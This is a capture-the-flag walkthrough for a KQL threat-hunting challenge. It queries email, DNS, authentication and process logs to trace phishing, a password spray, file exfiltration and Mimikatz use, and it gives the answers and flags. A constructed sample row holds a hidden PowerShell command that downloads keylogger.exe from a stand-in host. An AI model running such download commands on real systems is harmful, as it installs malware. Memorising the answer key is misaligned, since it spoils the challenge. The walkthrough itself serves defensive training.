
The Great Elf Conflict

Difficulty: (rating shown as an image in the original)

This challenge explained that if you answered all sections you would get Gold, so there is no "Silver" tier in this walkthrough.

Gold

Section 1: KQL 101

After a couple of "getting acclimated" questions, the actual questions start on Q3.

3: How many elves are there?

Employees
| count
90

4: Who is the Chief Toy Maker?

Employees
| where role == "Chief Toy Maker"
Shinny Upatree

5: Informational

Not really a question, but more "getting acclimated" with operators. Here are some additional operators the North Pole Cyber Defense Unit commonly uses:

== : Checks if two values are exactly the same. Case-sensitive.

contains : Checks if a string appears anywhere, even as part of a word. Not case-sensitive.

has : Checks if a string is a whole word. Not case-sensitive.

has_any : Checks if any of the specified words are present. Not case-sensitive.

in : Checks if a value matches any item in a list. Case-sensitive.

Type "operator" to continue.

operator
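Those one-line descriptions are where most wrong answers in Section 1 come from: counting "Twinkles" as a Twinkle, or missing a lower-cased name with ==. The block below is an added example, not part of the challenge or of the original walkthrough. It builds a small inline table with datatable (the rows are constructed, not challenge data) and shows every operator's verdict per row, plus the case-insensitive forms =~ and in~ that the list above leaves out. It can be pasted into any KQL query window and touches none of the challenge tables.

```kql
// Added example: a constructed table, not a challenge dataset.
let Sample = datatable(name:string, role:string)
[
    "Twinkle Frostington", "Toy Maker",
    "twinkle frostington", "toy maker",        // same person, lower-cased
    "Twinkles McGee",      "Chief Toy Maker",  // "Twinkles" is a different term from "Twinkle"
    "Angel Candysalt",     "Toy Maker"
];
Sample
| extend eq_exact     = role == "Toy Maker",                                   // case-sensitive, whole string
         eq_nocase    = role =~ "Toy Maker",                                   // case-insensitive, whole string
         contains_twk = name contains "twinkle",                               // substring anywhere, case-insensitive
         has_twk      = name has "twinkle",                                    // whole term only, case-insensitive
         has_any_team = name has_any ("Twinkle", "Angel"),                     // any whole term from the list
         in_list      = name in ("Twinkle Frostington", "Angel Candysalt"),    // exact match, case-sensitive
         in_nocase    = name in~ ("twinkle frostington")                       // exact match, case-insensitive
```

The Twinkles McGee row is the one that matters in practice: contains is true because the substring is there, while has and has_any are false because the term is "Twinkles", not "Twinkle". That distinction is why Q10 below uses has to pick out elves whose first name is Twinkle. The lower-cased duplicate row shows == and in missing a record that =~ and in~ catch.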

6: How many emails did Angel Candysalt receive?

First we need to grab Angel's email address:

Employees
| where name == "Angel Candysalt"
Then we craft our query:
Email
| where recipient == "angel_candysalt@santaworkshopgeeseislands.org"
| count
31

7: How many distinct recipients were seen in the email logs from twinkle_frostington@santaworkshopgeeseislands.org?

The question asks for distinct recipients, so deduplicate before counting rather than counting every email:

Email
| where sender == "twinkle_frostington@santaworkshopgeeseislands.org"
| distinct recipient
| count
32

8: How many distinct websites did Twinkle Frostington visit?

First we need Twinkle's IP address, so let's grab that (note the comparison is ==, a single = is not valid KQL):

Employees
| where name == "Twinkle Frostington"
This provides us with the IP, which we then plug into:
OutboundNetworkEvents
| where src_ip == "10.10.0.36"
| distinct url
| count
4

9: How many distinct domains in the PassiveDns records contain the word green?

PassiveDns
| where domain contains "green"
| distinct domain
| count
10

10: How many distinct URLs did elves with the first name Twinkle visit?

This one introduces let statements, which store a result under a name for reuse in the query that follows. The has operator is used so that only the whole word "Twinkle" matches.

let twinkle_ips =
Employees
| where name has "Twinkle"
| distinct ip_addr;
OutboundNetworkEvents
| where src_ip in (twinkle_ips)
| distinct url
| count
8


Section 2: Operation Surrender

Mission: Find out how Team Alabaster got the upper hand.

1: Type surrender

surrender

2: Who was the sender of the phishing email that set this plan into motion?

(This question said "who", so I thought it was supposed to be a person, not an email address; I went down a rabbit hole thinking I needed more than just the email, but alas, the email address was all the question wanted.) In other words: which address sent the surrender emails?

Email
| where subject contains "surrender"
| distinct sender
surrender@northpolemail.com

Two queries from that rabbit hole that did not produce the answer, kept for reference. The first looks for anyone who fetched the surrender page without having been phished:

let phished_emails =
Email
| where subject contains "surrender"
| distinct recipient; // Extract only the email addresses
let compromised_IPs =
Employees
| where email_addr in (phished_emails)
| distinct ip_addr; // Extract distinct IP addresses
OutboundNetworkEvents
| where src_ip !in (compromised_IPs) and url contains "albastersurrender"

This did not return any results, but I know the query worked because reversing the "!in" to "in" did include all of the compromised IPs.

The second looks for the document being created by anyone outside Team Wombley. The let variables hold usernames, not IPs, so they are named accordingly:

let TeamAlabasterUsers =
Employees
| where hostname contains "Elf-Lap-A"
| distinct username;
let TeamWombleyUsers =
Employees
| where hostname contains "Elf-Lap-W"
| distinct username;
FileCreationEvents
| where filename contains "Surrender.docx" and username !in (TeamWombleyUsers)

This also didn't work. One reason is visible in Q4 below: the attachment is a .doc, not a .docx, so the filename filter can never match.

3: How many elves from Team Wombley received the phishing email?

Email
| where subject contains "surrender"
| distinct recipient
| count
22

The query does not filter by team; the unfiltered count was accepted, so every recipient of the lure was on Team Wombley.

4: What was the filename of the document that Team Alabaster distributed in their phishing email?

Email
| where subject contains "surrender"
Team_Wombley_Surrender.doc

5: Who was the first person from Team Wombley to click the URL in the phishing email?

let phished_emails =
Email
| where subject contains "surrender"
| distinct recipient; // Extract only the email addresses
let compromised_IPs =
Employees
| where email_addr in (phished_emails)
| distinct ip_addr; // Extract distinct IP addresses
OutboundNetworkEvents
| where src_ip in (compromised_IPs) and url contains "albastersurrender"
| order by timestamp asc // earliest click first

The earliest hit comes from 10.10.0.25, which maps back to an elf:

Employees
| where ip_addr == "10.10.0.25"
Joyelle Tinseltoe

Joyelle's hostname: Elf-Lap-W-Tinseltoe

6: What was the filename that was created after the .doc was downloaded and executed?

The challenge supplied this query with a placeholder time window; the start is set to the click time from Q5 and the results are limited to Joyelle's laptop:

ProcessEvents
| where timestamp between (datetime("2024-11-27T14:11:45Z") .. datetime("2024-11-28T14:11:45Z")) // window starts at the Q5 click; tighten the end as needed
| where hostname == "Elf-Lap-W-Tinseltoe"
keylogger.exe
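Questions 5 and 6 are answered above by running one query, copying an IP and then a hostname by hand, and pasting them into the next. The block below is an added example, not code from the original walkthrough or from the challenge, that does the same chain as joins over constructed miniature copies of the four tables, so the click time flows straight into the process-event window. The column names follow the ones the walkthrough's queries use (recipient, email_addr, ip_addr, hostname, src_ip, url, timestamp, process_commandline); the sample rows, the process_name column and the phish.example URL are assumptions, not challenge data.

```kql
// Added example on constructed data; the _sample suffix keeps these names from
// shadowing the real Email, Employees, OutboundNetworkEvents and ProcessEvents tables.
let Email_sample = datatable(timestamp:datetime, sender:string, recipient:string, subject:string)
[
    datetime(2024-11-27T14:00:00Z), "surrender@northpolemail.com",         "jtinseltoe@santaworkshopgeeseislands.org", "Surrender now",
    datetime(2024-11-27T14:00:00Z), "surrender@northpolemail.com",         "nboetie@santaworkshopgeeseislands.org",    "Surrender now",
    datetime(2024-11-27T09:00:00Z), "santa@santaworkshopgeeseislands.org", "nboetie@santaworkshopgeeseislands.org",    "Holiday party"
];
let Employees_sample = datatable(name:string, email_addr:string, ip_addr:string, hostname:string)
[
    "Joyelle Tinseltoe", "jtinseltoe@santaworkshopgeeseislands.org", "10.10.0.25", "Elf-Lap-W-Tinseltoe",
    "Noel Boetie",       "nboetie@santaworkshopgeeseislands.org",    "10.10.0.40", "Elf-Lap-W-Boetie",
    "Shinny Upatree",    "supatree@santaworkshopgeeseislands.org",   "10.10.0.41", "Elf-Lap-A-Upatree"
];
let Outbound_sample = datatable(timestamp:datetime, src_ip:string, url:string)
[
    datetime(2024-11-27T14:05:00Z), "10.10.0.41", "http://phish.example/Team_Wombley_Surrender.doc",  // Team A previewing its own lure
    datetime(2024-11-27T14:11:45Z), "10.10.0.25", "http://phish.example/Team_Wombley_Surrender.doc",  // first Team Wombley victim
    datetime(2024-11-27T14:20:10Z), "10.10.0.40", "http://phish.example/Team_Wombley_Surrender.doc"
];
let Process_sample = datatable(timestamp:datetime, hostname:string, username:string, process_name:string, process_commandline:string)
[
    datetime(2024-11-27T13:00:00Z), "Elf-Lap-W-Tinseltoe", "jtinseltoe", "outlook.exe",    "outlook.exe",                                                                     // before the click: ignored
    datetime(2024-11-27T14:12:01Z), "Elf-Lap-W-Tinseltoe", "jtinseltoe", "winword.exe",    "winword.exe Team_Wombley_Surrender.doc",
    datetime(2024-11-27T14:12:30Z), "Elf-Lap-W-Tinseltoe", "jtinseltoe", "powershell.exe", "powershell.exe -w hidden -c iwr http://phish.example/keylogger.exe -OutFile keylogger.exe",
    datetime(2024-11-27T14:13:00Z), "Elf-Lap-W-Tinseltoe", "jtinseltoe", "keylogger.exe",  "keylogger.exe",
    datetime(2024-11-27T14:13:00Z), "Elf-Lap-W-Boetie",    "nboetie",    "chrome.exe",     "chrome.exe"                                                                       // other host: ignored
];
// Step 1 (Q5): phished recipients -> their laptops -> earliest Team Wombley hit on the lure URL.
let FirstClick = Email_sample
| where subject contains "surrender"
| distinct recipient
| join kind=inner (Employees_sample) on $left.recipient == $right.email_addr
| join kind=inner (Outbound_sample | where url contains "Surrender.doc") on $left.ip_addr == $right.src_ip
| where hostname startswith "Elf-Lap-W"        // only Team Wombley victims count; Team A sent the lure
| summarize arg_min(timestamp, name, hostname, src_ip)
| project click_time = timestamp, name, hostname;
// Step 2 (Q6): everything that ran on that laptop in the hour after the click, oldest first.
Process_sample
| join kind=inner (FirstClick) on hostname
| where timestamp between (click_time .. (click_time + 1h))
| project timestamp, hostname, name, process_name, process_commandline
| order by timestamp asc
```

To run it against the challenge data, drop the four datatable definitions and replace the _sample names with the real table names; the join keys are the same columns the walkthrough's let statements already rely on. The window is anchored on click_time rather than a typed datetime, which removes the manual "you'll need to modify this" step.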

7: To obtain your flag use the KQL below with your last answer!

let flag = "keylogger.exe";
let base64_encoded = base64_encode_tostring(flag);
print base64_encoded
a2V5bG9nZ2VyLmV4ZQ==


Section 3: Operation Snowfall

1: Type snowfall to begin

snowfall

2: What was the IP address associated with the password spray?

This filter was supplied by the challenge and worked as-is without modification:

AuthenticationEvents
| where result == "Failed Login"
| summarize FailedAttempts = count() by username, src_ip, result
| where FailedAttempts >= 5
| sort by FailedAttempts desc
59.171.58.12

3: How many unique accounts were impacted where there was a successful login from 59.171.58.12?

AuthenticationEvents
| where result == "Successful Login" and src_ip == "59.171.58.12"
| distinct username
| count
23
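The supplied query for Q2 keys on failed attempts per username, which is the shape of brute force against a single account; a password spray is the opposite shape, one source touching many accounts with one or two tries each, so a per-username threshold can miss it. The block below is an added example, not the challenge's query and not from the original walkthrough, over a constructed AuthenticationEvents-style table: it scores each source by how many distinct accounts it failed against, then pivots to the accounts that same source later logged into, covering Q2 through Q4 in one pass. The columns timestamp, src_ip, username and result come from the walkthrough's queries; the service column, the thresholds and the sample rows are assumptions.

```kql
// Added example on constructed data; the real table is AuthenticationEvents.
let Auth_sample = datatable(timestamp:datetime, src_ip:string, username:string, result:string, service:string)
[
    // one source, many accounts, about one try each: spray
    datetime(2024-12-01T01:00:00Z), "59.171.58.12", "alsnowball",   "Failed Login",     "RDP",
    datetime(2024-12-01T01:00:03Z), "59.171.58.12", "jtinseltoe",   "Failed Login",     "RDP",
    datetime(2024-12-01T01:00:06Z), "59.171.58.12", "nboetie",      "Failed Login",     "RDP",
    datetime(2024-12-01T01:00:09Z), "59.171.58.12", "supatree",     "Successful Login", "RDP",
    datetime(2024-12-01T01:00:12Z), "59.171.58.12", "acandysalt",   "Failed Login",     "RDP",
    datetime(2024-12-01T01:00:15Z), "59.171.58.12", "tfrostington", "Successful Login", "RDP",
    // one user mistyping their own password from their own laptop: not a spray
    datetime(2024-12-01T02:00:00Z), "10.10.0.36",   "tfrostington", "Failed Login",     "SSH",
    datetime(2024-12-01T02:00:30Z), "10.10.0.36",   "tfrostington", "Failed Login",     "SSH",
    datetime(2024-12-01T02:01:00Z), "10.10.0.36",   "tfrostington", "Successful Login", "SSH"
];
// Spray score: distinct accounts failed against per source, and attempts per account.
// Thresholds are illustrative; tune them to the environment.
let SpraySources = Auth_sample
| where result == "Failed Login"
| summarize targeted_accounts = dcount(username),
            failures          = count(),
            first_seen        = min(timestamp),
            last_seen         = max(timestamp) by src_ip
| extend attempts_per_account = toreal(failures) / targeted_accounts
| where targeted_accounts >= 3 and attempts_per_account < 3
| project src_ip, targeted_accounts, failures, first_seen, last_seen;
// Pivot: which accounts did the spraying source get into, and over which service?
Auth_sample
| where result == "Successful Login"
| join kind=inner (SpraySources) on src_ip
| summarize compromised_accounts = make_set(username),
            services             = make_set(service),
            first_success        = min(timestamp) by src_ip, targeted_accounts, failures
```

Against the real data, replace Auth_sample with AuthenticationEvents and drop the service column if the table does not have one. dcount(username) per source is the spray signal; the challenge's per-username count is still worth running alongside it, since it catches the single-account brute force that this query deliberately ignores.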

4: What service was used to access these accounts/devices?

AuthenticationEvents
| where result == "Successful Login" and src_ip == "59.171.58.12"
RDP

5: What file was exfiltrated from Alabaster's laptop?

ProcessEvents
| where username == "alsnowball"

The command line in the results shows the copy to a network share:

copy C:\Users\alsnowball\AppData\Local\Temp\Secret_Files.zip \wocube\share\alsnowball\Secret_Files.zip

Secret_Files.zip

6: What is the name of the malicious file that was run on Alabaster's laptop?

Same filter as Q5: EncryptEverything.exe

7: To obtain your flag use the KQL below with your last answer!

let flag = "EncryptEverything.exe";
let base64_encoded = base64_encode_tostring(flag);
print base64_encoded

RW5jcnlwdEV2ZXJ5dGhpbmcuZXhl


Section 4: Echoes in the Frost

1: Type stay frosty to begin

stay frosty

2: What was the timestamp of the first phishing email about the breached credentials received by Noel Boetie?

Email
| where subject contains "breach"
2024-12-12T14:48:55Z

3:

The download of echo.exe itself can be timed from the outbound network logs:

OutboundNetworkEvents
| where url == "https://holidaybargainhunt.io/published/files/files/echo.exe"
2024-12-12T15:13:55Z

4: What was the IP for the domain where the file was hosted?

PassiveDns
| where domain contains "holidaybargainhunt.io"
182.56.23.122

5: Let's take a closer look at the authentication events. I wonder if there were any connection events from 182.56.23.122. If so, what hostname was accessed?

AuthenticationEvents
| where src_ip == "182.56.23.122"
WebApp-ElvesWorkshop

6: What was the script that was run to obtain credentials?

ProcessEvents
| where hostname == "WebApp-ElvesWorkshop"
Invoke-Mimikatz.ps1

7: What is the timestamp where Noel executed the file?

ProcessEvents
| where username contains "boetie"
2024-12-12T15:14:38Z

Section 4 (continued)

1: What domain was the holidaycandy.hta file downloaded from?

OutboundNetworkEvents
| where url contains "holidaycandy.hta"
compromisedchristmastoys.com

2: What was the first file that was created after extraction?

ProcessEvents
| where process_commandline contains "frosty"
sqlwriter.exe

3: What is the name of the property assigned to the new registry key?

Using the same filter as above, the same ProcessEvents entry gives it: frosty

4: To obtain your FINAL flag use the KQL below with your last answer!

let finalflag = "frosty";
let base64_encoded = base64_encode_tostring(finalflag);
print base64_encoded
ZnJvc3R5

Entering the final answer for each section gets you the credit back in the game: click Badge > Objectives > Microsoft KC7.